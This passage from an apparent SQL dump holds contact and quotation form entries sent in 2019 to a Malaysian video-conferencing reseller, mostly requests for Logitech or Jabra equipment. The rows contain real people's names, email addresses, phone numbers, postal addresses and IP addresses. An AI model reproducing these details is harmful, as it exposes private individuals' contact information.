Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:156:\"Logitech Group, Logitech Rally, Logitech MeetUp, Logitech Connect, Logitech BCC950, SMARTDOCK, SmartDock Extender Box, Screen Share, Logitech SmartDock Flex\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:119:\"Am looking for video conferencing system that to be connected to a 70 inch TV in meeting room. Please advise. Thanks...\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"17\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-10-21 07:55:25','219.92.83.219','1'),(342,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"MUHAMAD AZRIL BIN ABDULLAH\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"muhamad.azril@yadim.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0195685529\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:32:\"YAYASAN DAKWAH ISLAMIAH MALAYSIA\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:89:\"ARAS 4 BLOK D KOMPLEKS ISLAM PUTRAJAYA NO.3 JALAN TUN ABD RAZAK PRESINT 3 62100 PUTRAJAYA\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Group\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:75:\"If you have any kind of device video conferencing can suggest to us. Thanks\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"57\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-10-22 11:07:15','175.139.199.249','1'),(343,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"Lim Puay Aun\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:31:\"puayaun.lim@teledirectgroup.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0123717282\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:31:\"Teledirect Telecommerce Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:80:\"I&#039;m looking to purchase AV&amp; VC systems. Kindly contact me urgently pls.\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"88\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-10-22 12:46:05','96.9.161.226','1'),(344,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"MUHAMAD AZRIL BIN ABDULLAH\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"muhamad.azril@yadim.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0195695529\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:32:\"Yayasan Dakwah Islamiah Malaysia\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:89:\"Aras 4 Blok D Kompleks Islam Putrajaya No.3 Jalan Tun Abd Razak Presint 3 62100 Putrajaya\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"Logitech C9230e\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:57:\"Request quotation for 6 unit of the item selected, Thanks\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-10-24 15:21:30','175.139.199.249','1'),(345,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"Jeewamaran\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:34:\"jeewamaran.yelumalai@oag-group.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"+60133613241\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"OAG Group of Companies\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:197:\"We have a meeting room equipped with Lifesize Icon 600 hardwares. We like to explore other options instead of a CMS and are opened to cloudbased solutions. Kindly contact me for further discussion.\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"10\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-10-24 19:37:39','175.139.193.217','1'),(346,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"LEE CHIN WUI\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"cw_lee@tcrsa.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0162627499\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"TOYO CR SDN BHD\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:181:\"Dear Sir/Madam, please quote us to supply 2 units Jabra Speak 510 UC. Delivery to&quot; No.5A, Tingkat Atas, Jalan Beranang Dua 27/14B, Taman Bunga Negara, 40400 Shah Alam, Selangor\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-10-25 16:17:17','60.53.199.188','1'),(347,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"Hafizuddin Sutimin\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"admin@sugoiresources.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"+601161237363\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"Sugoi Resources\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:25:\"I want to use the service\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"95\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-10-26 20:49:14','123.136.116.127','1'),(348,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:7:\"Testing\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Test@gmaik.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:3:\"012\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:4:\"Test\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Group\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-10-28 17:40:32','183.171.16.114','1'),(349,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"GHADAFFI BIN ROSLI\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"ghadaffi@neural.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0122936275\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:23:\"Neural Services Sdn 